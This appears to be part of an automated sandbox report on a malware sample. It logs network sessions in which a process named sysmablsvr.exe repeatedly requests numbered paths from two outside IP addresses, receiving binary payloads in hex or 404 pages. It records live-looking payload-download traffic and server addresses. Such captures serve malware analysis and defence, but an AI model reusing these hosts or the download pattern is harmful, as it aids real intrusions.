                                            Sep 17, 2024 23:12:28.823796034 CEST1236INData Raw: e6 60 47 db 45 50 53 04 e8 8f bb 01 e6 3b 2c 49 c8 88 f8 05 73 83 21 8b 9e 94 42 ff f9 f0 a9 0b e3 3a 00 04 1e 3d a5 44 c2 ea b7 ad 51 bb 98 b2 b8 3a e4 a0 ca c6 c8 44 0c 9a 76 d4 5b b0 88 4d e2 52 c6 c9 e2 40 0e 53 58 ee 61 9a 25 6f 20 1e f7 81
                                            Data Ascii: `GEPS;,Is!B:=DQ:Dv[MR@SXa%o '!Y| `'qC=B*Q<>K@#V/E_y~IA_sfZ&*:Ie4vz}T\;c$xqLH&(PigNCkH,o<|MR
                                            Sep 17, 2024 23:12:28.823827982 CEST1236INData Raw: 25 06 23 e1 26 62 a9 9d 56 7d c1 d8 30 4d df df db c6 ad 88 42 7e 6f f6 61 a3 6d 2d 2f 90 7b 14 07 e5 4d 2d d7 ba 3a 74 9a 82 dd a8 40 84 e5 09 e7 e5 db 3a 97 cf a0 4c b5 a7 61 10 de 2e 81 8c 61 f6 73 67 87 64 62 80 b9 d8 07 cb 91 fd 9a 5b 7f 31
                                            Data Ascii: %#&bV}0MB~oam-/{M-:t@:La.asgdb[1fHeb@6M9N#4-z2D? ,L2Xp#L_LQ@\PWJp+bv;SBigrB^wNI:hdsNyz_0jZ{B:a)
                                            Sep 17, 2024 23:12:28.823868990 CEST1236INData Raw: f8 21 ce 6e ad 25 96 e5 18 4a 78 3c 12 b1 99 ae c3 8f 43 2b 07 03 b4 9a c8 94 9b c2 6e 16 e2 d9 9e 80 f4 30 01 71 49 1e fd f8 1a a3 44 83 8a 10 66 62 77 e7 54 4e 0f 59 a9 d5 a8 4c da 33 66 c9 f6 86 cb 6e 5b a3 66 4a 88 22 7a 3b c6 87 c8 31 5e bd
                                            Data Ascii: !n%Jx<C+n0qIDfbwTNYL3fn[fJ"z;1^S-*on}iKw{3tgiqzSu>e8KLK>0Bk8V#8kqME;A+!+![."-%J}]]~P/g
                                            Sep 17, 2024 23:12:28.823914051 CEST1236INData Raw: 12 5a 89 f7 4f a1 8e 4c ee 8f 36 8b b8 88 83 f1 07 0c f4 e1 56 6c 77 d2 98 ff 81 95 62 31 5b c5 87 eb 62 79 c1 b8 e2 96 8f 49 c4 b2 c5 fe d5 b0 7a 17 93 b4 12 5f ef a9 97 ae 5c 2f d5 dc 57 df 59 1d f0 64 64 44 e8 6c 73 70 06 10 94 17 6b 19 49 18
                                            Data Ascii: ZOL6Vlwb1[byIz_\/WYddDlspkI[$i]9K7EuT>75}BexrxZ"RvMEhoY%;%$/n3k$~k;WvHc|*~,)DC
                                            Sep 17, 2024 23:12:28.823950052 CEST1236INData Raw: d4 20 32 98 00 e1 df 64 5b 58 ab c9 35 fb 1b b9 30 ff 65 fd 21 55 45 0c 0a 91 6f 03 c6 9a 3d 06 92 7d 75 e2 04 0c f1 a6 ee c0 40 3f d4 b4 c2 c4 6a 1a 8c 46 35 64 f6 0d a5 da 51 49 c5 8b b5 5d a2 e8 6e 10 73 8f 19 23 91 ec 54 31 3e 8e 01 a2 2a 8b
                                            Data Ascii: 2d[X50e!UEo=}u@?jF5dQI]ns#T1>*hcIX*;:*O`8'((6+i:z?W2=gABW?r)p^m;o[SMsZ6M-=&]vQz~yTtR`./TS
                                            Sep 17, 2024 23:12:28.829000950 CEST1013INData Raw: 5a 8a 76 10 cf c9 40 f7 c8 bb a5 2f 77 69 51 7b 86 f5 15 44 e4 96 49 9f 65 7c f2 11 8b ca 6e 39 9b ce 63 69 95 2f 52 5c 97 aa fa 6d cd 26 f5 37 8e 30 b9 db fd b2 dd 52 a4 64 ef aa b5 78 7c a3 8b b6 41 47 a5 47 06 00 74 2c e8 ac c5 7f 2a e7 10 b7
                                            Data Ascii: Zv@/wiQ{DIe|n9ci/R\m&70Rdx|AGGt,*^V-#$0}V3-YX/dAmKWfA?jx)~zD~{-_~%ec&f/XTTXxu{P[wj1vZ`vE6t>8Of'P


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            52192.168.2.44982091.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:35.284993887 CEST166OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:35.986341000 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:35 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
                                            Connection: keep-alive
                                            ETag: "66e17142-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 2e 7e f0 5e 84 6b f0 eb 96 ea 4a 6a d8 5c 77 e1 0b 06 58 4d 99 2c 1c 04 2f ab f2 50 5c 0c 95 19 8b 0a b6 9e 12 c0 c5 a8 d5 56 11 38 8f 5a 61 6f 19 90 c7 21 70 7f ee 82 f6 69 81 73 e3 fe da 22 ae 77 39 00 16 34 6f 1a 91 a1 f1 d0 db 37 76 be 4b 27 f1 36 32 8d 2e fd 5e cf b1 00 eb 4b 72 16 21 fd 5c af 45 41 d6 dc 46 a7 a7 e4 45 2e 69 9b 06 a3 32 f4 2b 33 80 bb af 3b f3 5f ad 27 90 a3 00 e9 46 fd 3c 04 0e c1 67 84 7e 9c 01 83 74 da e3 d2 f0 ab 40 1c 53 24 d1 7c 12 d9 02 5e fb a8 0e 2f 33 2d 18 4d 12 2a 24 2d d6 3a 4f 0d 0a 00 b1 76 b9 36 1d 63 79 91 40 ae ce 13 9c d5 a6 70 91 ba 2d cc fb 81 2c 3a 62 fc 77 e1 a0 26 41 29 95 b0 01 1f b1 1e cc 7d fe 6e 33 68 b8 ad 89 e6 44 48 3e c9 67 be 8e 5f c5 22 f6 97 b0 e0 6b ec a6 b0 ca 48 a4 be 6a f0 74 98 ba 90 11 74 b3 2f 03 da 20 16 56 df e7 78 73 60 c7 81 c6 06 ee 5c ff fa 65 60 8b d1 30 e8 2e 41 f1 b3 e8 20 39 24 a6 dd 9d 32 8f ed 28 25 51 fe 08 50 97 5b ca a9 8a e9 8d 34 8c 38 5d 8d 79 3d 26 ab cb 83 d5 9b 9d a9 20 d6 17 ed 94 d9 df cd 3b 61 02 b3 45 55 c0 de [TRUNCATED]
                                            Data Ascii: .~^kJj\wXM,/P\V8Zao!pis"w94o7vK'62.^Kr!\EAFE.i2+3;_'F<g~t@S$|^/3-M*$-:Ov6cy@p-,:bw&A)}n3hDH>g_"kHjtt/ Vxs`\e`0.A 9$2(%QP[48]y=& ;aEUzrgRGX{Hi|IUeR9.!HJYCou=3_wev,qbsbT9BX'F,DnBoiYSgDzp.IA+V.QcRhXu>N![2V]pLXe%kYR#rOBoRust[cJv6|+$kv:?c8jO)~m><X`Vk,.d+z})P|~h?n)W,H;]6~}RZ_Zjx"~?mkV";G`mN$+_R~lwR!LoQ_gzfg6:FfvJr-t`i;w$K\P9!jtErORbT|[`WK^&bO50omvD0w:]CLW
                                            Sep 17, 2024 23:12:35.986388922 CEST1236INData Raw: a4 17 e7 bb 21 6c dd 35 58 41 57 e9 a9 92 ec 85 6f 50 16 1e 1c 67 80 62 32 9a 78 28 be 5d c5 c2 07 8f 75 83 8b 99 bf 65 68 45 29 25 90 da 08 b9 0f f3 5c a8 1f ff 5b 9b a1 ea bc e2 dd d8 8f 99 11 db 43 82 1b 7c 82 21 62 4b 2c cc d3 18 19 1e 3b 06
                                            Data Ascii: !l5XAWoPgb2x(]uehE)%\[C|!bK,;TSdr34S^sfN[8fob.4Zj=,lD<0jb<8epOLLTtcA7$V~M1o"hn8}-IEG;ukG(3~-%Ox
                                            Sep 17, 2024 23:12:35.986409903 CEST1236INData Raw: ae 92 f8 4d f8 fb 4d 72 90 01 3c 84 3a 9a 7d a2 ea 6b de 64 5d a1 b8 a7 09 27 4b b0 22 83 60 80 73 64 ad 8e 6b b1 a8 01 f2 30 67 68 f3 6d 8d 2a 15 d0 0e e6 57 14 3d 80 12 31 6e cd d1 69 54 08 f5 57 0b d4 66 d7 14 1e d4 55 58 81 55 7b 60 87 47 dc
                                            Data Ascii: MMr<:}kd]'K"`sdk0ghm*W=1niTWfUXU{`GZgqd8n%{VF^[I;Q+6-/XAP>!-:@OAivkGs^'5D@6A`Z-Uk+7.+"eG1m-tq:9KkE@IUit )gq
                                            Sep 17, 2024 23:12:35.986664057 CEST1236INData Raw: 31 eb c5 84 d3 20 2f 07 09 a7 37 f8 ae 53 30 23 27 67 d7 43 83 38 0e 19 73 18 bf 7d a1 58 31 9a b3 ef d8 a9 e3 6f 08 81 7e 32 a3 fd ff 8a db bb db 3d 54 ac 98 e6 cd da 6c 72 22 78 f0 93 85 38 aa c5 b8 4b cb c8 77 9a 69 64 2d c9 6f 65 86 79 21 a3
                                            Data Ascii: 1 /7S0#'gC8s}X1o~2=Tlr"x8Kwid-oey!^2_J{|a'ELt5~VdV0+XaJTSeA&y%}m`w/Ne0timv(67*o~<y5irt qEJ_km
                                            Sep 17, 2024 23:12:35.986689091 CEST1236INData Raw: 6e 99 2e ee 27 8f 45 e7 c3 9f ff 48 d8 8e 64 30 01 e1 7a cd a9 45 00 59 89 b5 8f 4b 38 88 44 42 58 33 c6 6e 68 54 5d d8 25 99 35 ec e0 8c 26 9f 2b 52 5e 93 f6 32 52 24 d4 2e f0 09 69 e6 ce 64 0b 37 cb 86 99 3f 11 f0 a7 e8 f4 b7 01 40 34 d5 66 ec
                                            Data Ascii: n.'EHd0zEYK8DBX3nhT]%5&+R^2R$.id7?@4fVV^iPH`z%"Np"\((0tYC9"d?7%2[vpnH%w pAI'lZz5xXdOBZShUBIw1V(,
                                            Sep 17, 2024 23:12:35.986706018 CEST1236INData Raw: 29 ac ec ff 2d 61 a7 3d b7 e2 f3 67 19 3e 4c 75 78 c2 75 e3 69 cf 69 cd 5e 47 69 a9 ad 6b 7b 74 14 c4 42 6c 16 a9 59 7a d2 94 14 3a 34 4e cf 19 32 94 31 b3 3c 16 60 0d 71 97 c7 0e b9 66 1e 93 d3 44 09 71 2b d9 f1 4c 78 e8 8c 97 2a 8b fd f3 e4 3b
                                            Data Ascii: )-a=g>Luxuii^Gik{tBlYz:4N21<`qfDq+Lx*;(`>U/PP"~LE4A|p8 x0'7!uAs'AY6JU,X&J#y:OvY!Z0?kUX\iA
                                            Sep 17, 2024 23:12:35.986722946 CEST776INData Raw: f6 a9 46 ee 72 66 ef 41 e4 f0 da f5 92 a0 64 03 c8 6c 69 f9 1c c8 62 6b bb 8b cc c2 57 c7 93 e8 fe 6b bc b8 56 75 3b 3c 8d 5e 70 e5 db 13 b9 26 33 06 ad 83 55 46 35 93 bf e2 95 dc c6 65 1b 90 ef c6 e6 3f 2d aa f3 95 85 3a 18 8a 6e 41 66 39 8b 82
                                            Data Ascii: FrfAdlibkWkVu;<^p&3UF5e?-:nAf9l8IT'=|#]$(-ZIH~]Ho7z6=b,0@;srg>bxia!)8d;kX0c2S}6vn_9cdPxJ5Abq


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            53192.168.2.44982191.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:38.028651953 CEST166OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:38.728172064 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:38 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            54192.168.2.44982391.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:40.760751009 CEST166OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:41.466754913 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:41 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            55192.168.2.44982591.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:44.085854053 CEST166OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:44.777846098 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:44 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            56192.168.2.44982691.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:46.807213068 CEST166OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:12:47.533663988 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:47 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            57192.168.2.449828185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:50.684051037 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:12:51.404925108 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:51 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            58192.168.2.449829185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:53.434623957 CEST166OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:12:54.150146008 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:54 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            59192.168.2.449831185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:56.183052063 CEST166OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:12:56.870342970 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:56 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
